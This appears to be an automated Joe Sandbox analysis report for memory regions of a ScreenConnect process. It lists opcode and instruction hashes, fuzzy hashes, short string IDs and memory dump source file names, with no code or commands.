                                                                                    • Opcode ID: 670d4e09c3f01718e57bac6c07dc106a5d3e8649f2bd0c09e0ebf1ae6a6816b5
                                                                                    • Instruction ID: fb48bbac8f8c7313daba418b270235f7830d6598568c99805b9d705cea8bef3e
                                                                                    • Opcode Fuzzy Hash: 670d4e09c3f01718e57bac6c07dc106a5d3e8649f2bd0c09e0ebf1ae6a6816b5
                                                                                    • Instruction Fuzzy Hash: 672106B6C002498FDB10CF9AC444BEEBBF5FB48324F14846DD459A7240D7B9A545CFA5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: d
                                                                                    • API String ID: 0-2564639436
                                                                                    • Opcode ID: 7c05b95111db0090936a37b8673444406648a6241a0649fbce37061b937ff37b
                                                                                    • Instruction ID: a5f590b14f4cf1a66fb122281069213dd42787c22ace51052f0246e4aa2fe630
                                                                                    • Opcode Fuzzy Hash: 7c05b95111db0090936a37b8673444406648a6241a0649fbce37061b937ff37b
                                                                                    • Instruction Fuzzy Hash: 7AD14D74A10605CFCB08EF68C984A99B7B2FF5D310B158659E919AB365EB30FC85CF90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: c!
                                                                                    • API String ID: 0-3867720870
                                                                                    • Opcode ID: 64fae811d7535849e11d34550576c98f1b4e5fb793e0df3c40e348b30d40ea5b
                                                                                    • Instruction ID: a9f3b561c8aa4b2aa18f905a631a0b20184bab891d14c236051405b8839de2e6
                                                                                    • Opcode Fuzzy Hash: 64fae811d7535849e11d34550576c98f1b4e5fb793e0df3c40e348b30d40ea5b
                                                                                    • Instruction Fuzzy Hash: 7CB16170A01205AFDB05EF69D54459EBBF2EF88304B14C929E416AF368FF71EC468B91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: d
                                                                                    • API String ID: 0-2564639436
                                                                                    • Opcode ID: 800d405239a5da493f9a2185992c710b40d582ea048799c6874c976bc234b153
                                                                                    • Instruction ID: 22b2f1caa1598d489da6c4c89f155b4ed5efd8720a0dfb71ed74e55d23d50d3b
                                                                                    • Opcode Fuzzy Hash: 800d405239a5da493f9a2185992c710b40d582ea048799c6874c976bc234b153
                                                                                    • Instruction Fuzzy Hash: 5CC10774A10605CFCB08DF68D984A99B7B2FF5D310B158699E909AB365EB30FC85CF90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (&tq
                                                                                    • API String ID: 0-341024711
                                                                                    • Opcode ID: 845f7eef1294e8f033051f0a91275954da6a26476c10b180d4a32ca4271728b8
                                                                                    • Instruction ID: ebede8d4ca03074bfa9d1482828d2bd5f76e05afc84215a8ad27742ce029facd
                                                                                    • Opcode Fuzzy Hash: 845f7eef1294e8f033051f0a91275954da6a26476c10b180d4a32ca4271728b8
                                                                                    • Instruction Fuzzy Hash: BE519071F002198BDB15EFA9C4906EEBBF2AF99710F148119D406BB394EF34AD46CB91
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LRtq
                                                                                    • API String ID: 0-4092542751
                                                                                    • Opcode ID: a5d7278088c611813848149ce51aee05c039d9d2da1223f72988a20293f79ea3
                                                                                    • Instruction ID: 5ea8f1ac2cf6870ccd85f2bdd2a0e7eeaaae0e9c661a4b58d5b0f66e56807c55
                                                                                    • Opcode Fuzzy Hash: a5d7278088c611813848149ce51aee05c039d9d2da1223f72988a20293f79ea3
                                                                                    • Instruction Fuzzy Hash: 4221C671B041098BD7149BB5E4657ED7BB6FB8C321F188468E402B7364EB705842CB60
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: s4h
                                                                                    • API String ID: 0-3799315901
                                                                                    • Opcode ID: c1b34374567bb6015505193a375292148860d2a7eb147336c2f39b6f41542117
                                                                                    • Instruction ID: bfc484d06d9e7367e66ef8d06bf91860e5428918bbe69ce54f602c83ef9cd2ca
                                                                                    • Opcode Fuzzy Hash: c1b34374567bb6015505193a375292148860d2a7eb147336c2f39b6f41542117
                                                                                    • Instruction Fuzzy Hash: 472148B6800249DFCF10CF9AC840ADEBBF1FB88320F188419E914A7210D379A551CFA1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: s4h
                                                                                    • API String ID: 0-3799315901
                                                                                    • Opcode ID: d88a78f29269085f3bc552ac0bd03e488c6b11f898fdaabe806528bd9a4c8c2d
                                                                                    • Instruction ID: d10da093e309a2c34f14d6a6538bd99679f32615af2e353a25fff00d411a05da
                                                                                    • Opcode Fuzzy Hash: d88a78f29269085f3bc552ac0bd03e488c6b11f898fdaabe806528bd9a4c8c2d
                                                                                    • Instruction Fuzzy Hash: F62148B6900249DFDF10CF9AC844ADEBBF5FB48310F188419E914A7210D379A951DFE5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: LRtq
                                                                                    • API String ID: 0-4092542751
                                                                                    • Opcode ID: 33b109b4821e4b847f7950ecf4722497b4d2d5ea61aa456cfaf330cf41453392
                                                                                    • Instruction ID: e69eb7fc3de3f07f2badf2e73648555c91b33de990fcacb86b7decacdaa72c5d
                                                                                    • Opcode Fuzzy Hash: 33b109b4821e4b847f7950ecf4722497b4d2d5ea61aa456cfaf330cf41453392
                                                                                    • Instruction Fuzzy Hash: A5216630B042098BDB14DF76D5647EEBAF6BB8C721F189468E402B7394EB716C41CB90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: ^
                                                                                    • API String ID: 0-1590793086
                                                                                    • Opcode ID: 09cf488a67f92ebae7c7cd9262f8f111f617af75d8f4e68ab96e4acab8c70600
                                                                                    • Instruction ID: 0f6d46b4712dfe7e5d1a78ccfe034e390001763aaa5c83d270dd963702f6ec3a
                                                                                    • Opcode Fuzzy Hash: 09cf488a67f92ebae7c7cd9262f8f111f617af75d8f4e68ab96e4acab8c70600
                                                                                    • Instruction Fuzzy Hash: B3F017A420E3C15FE702AB24C9A0555BF719F47209F0E80C6D8C0DF2A7D9699A4AC761
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b64b3a325ea6ec5e4b209bc8041eaea8c36bd3ad3db33bea80da5a387ada664d
                                                                                    • Instruction ID: dfa74fd8cf3b7c7588a8675a37263ccbfd3b74adf8a2f0f7e6e2df5733aadfab
                                                                                    • Opcode Fuzzy Hash: b64b3a325ea6ec5e4b209bc8041eaea8c36bd3ad3db33bea80da5a387ada664d
                                                                                    • Instruction Fuzzy Hash: 3F717074B002068FDB15DFA9C45066EFBF6EFD9210B188529D41AAB364FE70FC428B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 198af2251eed417833ba3e9e7a2794df8a91b13c7caa2dd2c4a78abaf6c4f986
                                                                                    • Instruction ID: 96649db05aa0116848544beb1a0c7e3377f5df64aa46868d94073ac80f3e4388
                                                                                    • Opcode Fuzzy Hash: 198af2251eed417833ba3e9e7a2794df8a91b13c7caa2dd2c4a78abaf6c4f986
                                                                                    • Instruction Fuzzy Hash: 5961C375B002058FDB04EF79D484AAEBBF6FF88214B14846AD509DB365EB70EC06CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 0fc25618061eded6956b7df1fd8c8f62e55f8363b33cdc686a0400b86d785bfa
                                                                                    • Instruction ID: 67310f819ecc1815e2cc35eb6556d76c9d4a9c192fbdf6b10f5d3a07b0cd2363
                                                                                    • Opcode Fuzzy Hash: 0fc25618061eded6956b7df1fd8c8f62e55f8363b33cdc686a0400b86d785bfa
                                                                                    • Instruction Fuzzy Hash: 4051EE30701305AFD715EB7AD990A2EB7E6EBD8710B58852AD0168F384FF74EC458B91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7ba33724175c32032cda627d826d26275470b9f0facd3a7e4e1f34d0eb80a9f5
                                                                                    • Instruction ID: 9d38dc861b11f1d4faaf5c7463e27d6877fd428b3690e65bd7cf80699e409783
                                                                                    • Opcode Fuzzy Hash: 7ba33724175c32032cda627d826d26275470b9f0facd3a7e4e1f34d0eb80a9f5
                                                                                    • Instruction Fuzzy Hash: 7651F6707006068FDB24DF7AD88495AB7F2FF993147148A58E49ADB7A4EB30F8058F90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: b496b70a19c9469efdebac45572f349e0ae706e2d4ff61eacc292ef634197b88
                                                                                    • Instruction ID: f2ea51985124db71032d0802c4c04d66d26bbd62e1385fae17fc83f970a32487
                                                                                    • Opcode Fuzzy Hash: b496b70a19c9469efdebac45572f349e0ae706e2d4ff61eacc292ef634197b88
                                                                                    • Instruction Fuzzy Hash: C0510E307063419FD705AB7AD890A2EBBE2EBD9710B18852AD016CF395FE74EC45CB91
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 30c93ae330e9c14f292d008b914161178290fdcd4083d093f758274a2faef283
                                                                                    • Instruction ID: 1ab1f42922a7ee7cc0dcedc2b1ecc9816bc7d78ed0b27150dcce1024e0e948c6
                                                                                    • Opcode Fuzzy Hash: 30c93ae330e9c14f292d008b914161178290fdcd4083d093f758274a2faef283
                                                                                    • Instruction Fuzzy Hash: 7541B874600B018FD734DF29D858626B7F1BF99325B148A6CE496DB7A5E730F846CB80
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bcd8c8292619989fa94d01d4514f10ee869803e57b9eaf403512029cf4779bbe
                                                                                    • Instruction ID: ecdc882a3a23b3037ad38dd3a7c0de47420410c329bf257b8cfe8bc839559aa4
                                                                                    • Opcode Fuzzy Hash: bcd8c8292619989fa94d01d4514f10ee869803e57b9eaf403512029cf4779bbe
                                                                                    • Instruction Fuzzy Hash: 2B412B746047059FD720DF29C884A5ABBF2FF89314B188A58E4869B7A5E730F846CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: af7c38bd33e7082ab6d714d80338349704d6109fe7dacbc2ec32ef81cf27c0d0
                                                                                    • Instruction ID: a2dd333795c473a1b360af652c1459f6083fa75697c27e2090f2a31ff41fbd79
                                                                                    • Opcode Fuzzy Hash: af7c38bd33e7082ab6d714d80338349704d6109fe7dacbc2ec32ef81cf27c0d0
                                                                                    • Instruction Fuzzy Hash: FD41D2769082888FDB11CF78D594B99BFF1FF5A310F19419DC0459B371EA28A845CB61
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ff2f14432d0fef11ff43bc5c4f2b5e6ee30aca875aac176356acaad2ed14befc
                                                                                    • Instruction ID: 02216c2c35cb62a90eb6524299396dbecb3d0d93e45b93c191f430aa4ba7939b
                                                                                    • Opcode Fuzzy Hash: ff2f14432d0fef11ff43bc5c4f2b5e6ee30aca875aac176356acaad2ed14befc
                                                                                    • Instruction Fuzzy Hash: C4313A70B106158FDF04DFA9D4949AEF7E6EF89214B14852AD409EB758EB30FC018BD1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7b201e49d6617c63909d1ab123d87b9d58493f9d873387b93d0dca9de407467d
                                                                                    • Instruction ID: 16d4ef95b7164c6874de1e6ee68e19de2ffb5a59a9f2079e6c6b29dd222fe7c0
                                                                                    • Opcode Fuzzy Hash: 7b201e49d6617c63909d1ab123d87b9d58493f9d873387b93d0dca9de407467d
                                                                                    • Instruction Fuzzy Hash: A04116787006028FCB14DF69D99896ABBF2FF893107148968E91A9B365EB30FC41CB51
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 371f475f9e58e10cae67e1a18a78ac9426ee2ead9d63cf25f30e52ac91f99ab3
                                                                                    • Instruction ID: c0a316bebf617d3209c94da7b16f0c4878dc666dbacc2bea961e646b8d862bda
                                                                                    • Instruction Fuzzy Hash: ADF0A43124A6804FC355D774D9929953FF4EF4B15034645EAD059CB273DA18A80BE761
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 8feb7ad8ddcaaa934d5f5df44dc7a851a48b75854a81acc3803a49789d1a3895
                                                                                    • Instruction ID: 972603e2d36d90b27480d729ae1550b04f6b42652ce617e6560a91ddb4502851
                                                                                    • Opcode Fuzzy Hash: 8feb7ad8ddcaaa934d5f5df44dc7a851a48b75854a81acc3803a49789d1a3895
                                                                                    • Instruction Fuzzy Hash: 0EF0AF366042009FD315DB79E88454EFFE2EF86210318C96EE108CB255EE31E8028B90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: adf3ad8c4146289d0f8bb8d9d3560bd182deac7a1272d4aefc90420a34a994ad
                                                                                    • Instruction ID: 8d89c62be7154c330e6067041d0b6e5060f3f3f9ec5487b1ea8a98d32c2dbda8
                                                                                    • Opcode Fuzzy Hash: adf3ad8c4146289d0f8bb8d9d3560bd182deac7a1272d4aefc90420a34a994ad
                                                                                    • Instruction Fuzzy Hash: 84F0F6763042486FDF069F98AC605AF3FA7FBC8264B04401EF608D7251DE318C5197A1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 2bf766e3b38faee6441d10f7758cd0d39b7d7787d057b162cfe77685aacce1b5
                                                                                    • Instruction ID: 0ec58a451a0ba80a9ffb4499ed273f8f8ff14aaa7b736b2d8715115fa6b71bdd
                                                                                    • Opcode Fuzzy Hash: 2bf766e3b38faee6441d10f7758cd0d39b7d7787d057b162cfe77685aacce1b5
                                                                                    • Instruction Fuzzy Hash: 84F0F07190A7888FC742CF78CC910E8BFF0DE0655031986D7D488DB6A2E220AE07C791
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3518905043.000000000170D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0170D000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_170d000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 147daeb578337570ac27b56fa128df6314f39a34b0e8cf11ad99c1b9b520eaa7
                                                                                    • Instruction ID: 8803c85fc62a60e6623f71cbe7fa00112ec6ea53d6354fc53cee822e0b594d84
                                                                                    • Opcode Fuzzy Hash: 147daeb578337570ac27b56fa128df6314f39a34b0e8cf11ad99c1b9b520eaa7
                                                                                    • Instruction Fuzzy Hash: D6F06272404344AEE722CE5AC884B62FFD8EB41674F18C55AED8C4F2D6C2799845CAB1
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 9d15a7a9bc7dbac0a0dd1c83500ee013fb9125260d7b959687e0cc5d7b2c82ce
                                                                                    • Instruction ID: dddb2125738b306371f4b9d3834bd288fabf751800edc31e2a7875da61e0154e
                                                                                    • Opcode Fuzzy Hash: 9d15a7a9bc7dbac0a0dd1c83500ee013fb9125260d7b959687e0cc5d7b2c82ce
                                                                                    • Instruction Fuzzy Hash: 43F089363002196F9F059F999C409AF7BEBFBC8264B04402EF609D7250DE319C51A7A5
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7478e8b516df2b1f08c2789c875d97de945b4a56280217e7511558c9655feb4b
                                                                                    • Instruction ID: abe7c4598bc896cf2dc71e5c11a351fbf121fc3c42847039daaa88ec5b6ed517
                                                                                    • Opcode Fuzzy Hash: 7478e8b516df2b1f08c2789c875d97de945b4a56280217e7511558c9655feb4b
                                                                                    • Instruction Fuzzy Hash: BBF089753003015B9715BA6FB850997BBDEEBCD6543048529F529D7318FE60FC458BA0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 463d100a1120c7c3078890c12d9aaacba9f7ee9ecff7831da47483c8785cc589
                                                                                    • Instruction ID: aef872db131ad450e218e20a05bc18eb5c454da3eb5f542cccfd92c2da19d6aa
                                                                                    • Opcode Fuzzy Hash: 463d100a1120c7c3078890c12d9aaacba9f7ee9ecff7831da47483c8785cc589
                                                                                    • Instruction Fuzzy Hash: B1F02732700208AFCF166FA4A8441AE3B53EB88220B144418F60A9B674EE359C52A751
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7486e343d8a0b9f3a8046a60d189da269ade6cdae5f76d7e8939da4489784686
                                                                                    • Instruction ID: 56573c1508f98c0e3f5c2a49822d3a00b5ff67c45a10b5736c77ab691be5d177
                                                                                    • Opcode Fuzzy Hash: 7486e343d8a0b9f3a8046a60d189da269ade6cdae5f76d7e8939da4489784686
                                                                                    • Instruction Fuzzy Hash: C3F0F6F9A0024ACFCF04EF69E5187AEBBB0F749315F004A25C1219B248EF742545CF92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 70acaa7e9ab8fa277ea40e716f5cd376f8292c920e864749aaa45c1fd28f0e73
                                                                                    • Instruction ID: 5ab2c626994ced513c9e44f0aef60cde0ba123e876dc8f9c3c58d2a05ee1a0f1
                                                                                    • Opcode Fuzzy Hash: 70acaa7e9ab8fa277ea40e716f5cd376f8292c920e864749aaa45c1fd28f0e73
                                                                                    • Instruction Fuzzy Hash: BAF0F6F590428A9FDB00EFA4EA597AEBFB0F745301F008A29C1219B259EF742541CF92
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e2ecebc7e1f7383c6c4a6f305a4f1de992983250836917f745ad7971c3183165
                                                                                    • Instruction ID: aff4691445ddb62776f9d3af005ea45a5c12df86501923720cdcc19ff185c29c
                                                                                    • Opcode Fuzzy Hash: e2ecebc7e1f7383c6c4a6f305a4f1de992983250836917f745ad7971c3183165
                                                                                    • Instruction Fuzzy Hash: A2F0E2712053008FC314DF69E185A56BFE2EFC6715B0984ADE5498B3A2DA31FC02CB50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1c4bc66515e92b4b313b5785f9c5023fcc11b8c5abbc775b356be4946b5578f8
                                                                                    • Instruction ID: 2a6da26ffcd6e9387f5805fe5b70edb23a47a4ccf02eda534cf96d99484e1aff
                                                                                    • Opcode Fuzzy Hash: 1c4bc66515e92b4b313b5785f9c5023fcc11b8c5abbc775b356be4946b5578f8
                                                                                    • Instruction Fuzzy Hash: EAF03A30700114CFDB14DF29C494AAEB7F1EF883107098069E805DB364EE35ED01DB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5a57d61c3a333d2786653c4b16583a8f2f201f7beb52d984c6735cd5e87903a5
                                                                                    • Instruction ID: 0abd71d792aedaf035005adc8d4baaea4ca3f3f0a11206c1382820ff71016d97
                                                                                    • Opcode Fuzzy Hash: 5a57d61c3a333d2786653c4b16583a8f2f201f7beb52d984c6735cd5e87903a5
                                                                                    • Instruction Fuzzy Hash: 9FE06576704204AF5B44DE4ED450D5FBBAEDFD9260718C01AFA4CC7310E931E9428BA4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000007.00000002.3543114413.0000000004610000.00000040.00000800.00020000.00000000.sdmp, Offset: 04610000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_7_2_4610000_ScreenConnect.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c07900820053a6ab07097104467bdf1a981b69b1ffefb4e712c257e777a78942
                                                                                    • Instruction ID: f318348dda15e47665d06862af319b51dcfea45fcec2b827ed8238d80819a632
                                                                                    • Opcode Fuzzy Hash: c07900820053a6ab07097104467bdf1a981b69b1ffefb4e712c257e777a78942
                                                                                    • Instruction Fuzzy Hash: 08F0B271E00219DF8B40DFADC84069EFBF4EF89200B24806AD918E7211E731AA12CB80
                                                                                    Memory Dump Source
